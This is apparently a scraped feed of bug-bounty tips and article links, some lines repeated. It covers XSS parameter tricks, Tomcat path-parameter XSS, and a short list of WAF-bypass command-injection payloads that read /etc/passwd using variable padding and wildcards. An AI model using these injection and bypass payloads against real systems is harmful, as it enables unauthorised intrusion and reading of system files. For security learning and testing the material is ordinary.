From Recon to Optimizing RCE Results - Simple Story with One of the Biggest ICT Company in the World
https://medium.com/@YoKoKho/from-recon-to-optimizing-rce-results-simple-story-with-one-of-the-biggest-ict-company-in-the-ea710bca487a
https://medium.com/@YoKoKho/from-recon-to-optimizing-rce-results-simple-story-with-one-of-the-biggest-ict-company-in-the-ea710bca487a
Medium
From Recon to Optimizing RCE Results - Simple Story with One of the Biggest ICT Company in the World
How I Finally could Got into an Internal Network (and could accessing all of their internal assets) by Using Various Vulnerabilities.
Google ADS Stored Xss & Html Injections 5000$
https://www.youtube.com/watch?v=O5BWtwykJJg
https://www.youtube.com/watch?v=O5BWtwykJJg
Alway convert parameter to array you will get unexpected result, some times xss bypass
Like,
path=/abc to path["]=/abc
#bugbountytip
Like,
path=/abc to path["]=/abc
#bugbountytip
Use path parameters if server is Apache Tomcat & running jsp pages . Like
http://site.com/test.jsp;test=<payload>
, This pages can sometimes give xss.
#bugbounty
http://site.com/test.jsp;test=<payload>
, This pages can sometimes give xss.
#bugbounty
#WAF #ModSecurity #RCE #Payloads Detection #Bypass
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
;+$u+cat+/etc$u/passwd$u
;+$u+cat+/etc$u/passwd+\#
/???/??t+/???/??ss??
/?in/cat+/et?/passw?
JSON Web Tokens vs. Session Cookies for Authentication
https://t.co/ok14MFmdvL
Remembering the Shellshock Vulnerability
https://t.co/xUGGhKSvP5
4 Uncommon Python Tricks You Should Learn
https://t.co/bOOvVe92Us
#bugbountytips
https://t.co/ok14MFmdvL
Remembering the Shellshock Vulnerability
https://t.co/xUGGhKSvP5
4 Uncommon Python Tricks You Should Learn
https://t.co/bOOvVe92Us
#bugbountytips
Content Security Policy (CSP) Bypasses http://ghostlulz.com/content-security-policy-csp-bypasses/
Everything you want to know about IOT Security ! Simplified https://medium.com/bugbountywriteup/everything-you-want-to-know-about-iot-security-simplified-7dca1b9e1c22
Medium
Everything you want to know about IOT Security ! Simplified
The Internet of things is a network of devices that are connected to the Internet, controlled through it, and can exchange data with each…
Account takeover via postMessage: https://yxw21.github.io/2020/06/05/Account-Takeover-Via-PostMessage/
How to write a Bug Bounty report: http://10degres.net/how-to-write-a-bug-bounty-report/
Gwendal Le Coguic
How to write a Bug Bounty report
One of the first thing I learned when I started security, is that the report is just as important as the pentest itself.
Some bug bounty platforms give reputation points according the quality.
While there is no official rules to write a good report, there…
Some bug bounty platforms give reputation points according the quality.
While there is no official rules to write a good report, there…
“Penetration Testing Roadmap” by Knightsbr1dge https://link.medium.com/8ZZhEUqF86
Medium
Penetration Testing Roadmap
Knightsbr1dge.red